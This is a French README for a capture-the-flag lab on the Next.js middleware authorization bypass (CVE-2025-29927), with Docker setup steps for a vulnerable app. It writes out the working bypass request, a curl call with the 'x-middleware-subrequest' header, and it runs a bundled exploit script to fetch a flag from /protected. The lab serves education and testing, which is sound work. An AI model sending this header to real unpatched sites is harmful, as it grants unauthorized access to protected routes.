
Preuve de concept de type CTF démontrant le contournement d'autorisation du middleware Next.js (CVE-2025-29927). Inclut une application Docker vulnérable et un script d'exploit pour récupérer le flag depuis une route protégée.
Ceci est une Capture The Flag (CTF) sous forme de preuve de concept pour la vulnérabilité Contournement d'autorisation du middleware Next.js (CVE-2025-29927). L'objectif est de contourner le middleware d'authentification et de récupérer le flag depuis la route /protected.
/protected/git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
Cela démarrera l'application Next.js vulnérable sur http://IP:3000
Essayez d'accéder à :
curl -i http://IP:3000/protected
Vous serez redirigé vers /.
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
Utilisez le fichier exploit.py fourni pour contourner le middleware et accéder à la route protégée :
python3 exploit.py -url http://IP:3000
En cas de succès, vous récupérerez le flag depuis /protected.
Dockerfile - Construit l'application Next.js vulnérableexploit.py - Exploite la vulnérabilité pour contourner l'authentificationpages/ - Contient les routes vulnérables /protected et /loginmiddleware.js - La logique du middleware vulnérableREADME.md - Ce fichierCe PoC est destiné à des fins éducatives et de recherche uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.
Trouvez le flag en exploitant la vulnérabilité et en accédant à :
http://IP:3000/protected
Bonne chance ! 🏴☠️